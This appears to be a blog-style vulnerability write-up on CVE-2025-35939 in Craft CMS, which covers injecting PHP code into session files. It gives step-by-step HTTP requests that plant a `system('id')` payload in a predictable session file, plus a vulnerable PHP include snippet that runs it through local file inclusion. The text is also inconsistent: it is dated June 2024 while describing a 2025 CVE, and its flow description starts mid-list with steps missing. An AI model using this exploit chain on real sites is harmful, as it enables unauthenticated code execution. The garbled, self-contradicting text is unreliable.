*Published: June 2024*
Craft CMS is a widely used content management system for building flexible websites and digital experiences. But recently, a serious vulnerability (tracked as *CVE-2025-35939*) was discovered, showing how an unauthenticated attacker could abuse the way session files are handled, leading to possible code injection or information leaks—especially when chained with other vulnerabilities.
In this article, we’ll break down exactly how CVE-2025-35939 works, walk through the potential exploit step by step, and provide code samples so you can see the vulnerability for yourself. We’ll also discuss mitigation and provide links to the original references.
Versions Affected: Before 5.7.5 and 4.15.3
- Vulnerability: Arbitrary content can be injected into unsanitized PHP session files by unauthenticated users
References:
- Craft CMS Security Advisory
- GitHub Issue & Patch
Passes along the originally requested URL as a "return" parameter.
3. Generates a session file for this user at /var/lib/php/sessions/sess_[session_id].
Here’s the dangerous part:
Craft CMS does not sanitize the "return" parameter adequately before storing it in the session data. This means an attacker can craft a malicious URL containing arbitrary content—including potentially PHP code—that gets stored directly into a predictable session file on disk.
Other vulnerabilities (like Local File Inclusion, LFI) could then be used to execute this code.
1. Attacker sends a request to a protected URL with a malicious return parameter
GET /admin?return=%3C?php%20system('id');%20?%3E HTTP/1.1
Host: victim-craftcms.local
Cookie: PHPSESSID=exploit12345
Here, the ?return=<?php system('id'); ?> parameter (URL-encoded) is passed in. This can end up being written to the user's session file:
2. Craft CMS creates or updates the session file
Location: /var/lib/php/sessions/sess_exploit12345
File will contain a serialized PHP array, including the unsanitized return value like this
return|s:20:"<?php system('id'); ?>";
3. Attacker knows the path and name of the session file
- Path: /var/lib/php/sessions/sess_exploit12345
4. If there’s an LFI vulnerability…
If the site has any LFI bug (including those in plugins), the attacker can load their own session file via a crafted request:
GET /index.php?template=/var/lib/php/sessions/sess_exploit12345
PHP will treat the file as executable, and system('id'); will run!
Let’s simulate this with minimal PHP code. Suppose a site allows template inclusion like this
<?php
if (isset($_GET['template'])) {
include $_GET['template'];
}
When an attacker triggers the Craft CMS bug to create a session file containing
<?php system('id'); ?>
And then requests
http://example.com/index.php?template=/var/lib/php/sessions/sess_exploit12345
The server executes system('id');, exposing the vulnerability.
No Authentication Needed: Exploit can be triggered without logging in.
- Session File Paths: Often world-readable (or even world-writable) unless PHP is configured securely.
To stay safe
1. Update Immediately to the latest version (Download here).
References and Further Reading
- Official Craft CMS Advisory – CVE-2025-35939
- Craft CMS Releases and Changelog (GitHub)
- PHP Sessions Security
- Understanding Local File Inclusion (OWASP)
Conclusion
CVE-2025-35939 is a classic example of how unsanitized user input can lead to dangerous results, especially when session storage mechanisms make it easy for attackers to predict file names and locations. Even without a direct code execution vector, this bug dramatically opens up the attack surface. Combine it with other vulnerabilities, and you have a recipe for a serious breach.
Don’t wait—patch your Craft CMS today.
If you run bug bounty or pentesting on Craft CMS, keep your eyes peeled for similar session handling weaknesses!
Timeline
Published on: 05/07/2025 23:15:54 UTC
Last modified on: 06/03/2025 20:59:34 UTC